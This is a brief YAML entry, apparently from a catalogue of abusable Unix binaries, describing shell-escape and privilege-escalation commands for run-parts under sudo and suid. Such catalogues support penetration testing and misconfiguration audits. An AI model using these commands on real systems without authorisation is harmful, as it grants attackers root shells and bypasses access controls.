---
functions:
  shell:
  - code: |-
      run-parts --new-session --regex '^sh$' /bin
    contexts:
      sudo:
      suid:
        code: |-
          run-parts --new-session --regex '^sh$' /bin --arg='-p'
        shell: false
      unprivileged:
  - code: |-
      cp /bin/sh /path/to/temp-dir/
      run-parts /path/to/temp-dir/
    contexts:
      sudo:
      suid:
        code: |-
          cp /bin/sh /path/to/temp-dir/
          run-parts /path/to/temp-dir/ --arg='-p'
        shell: false
      unprivileged:
...
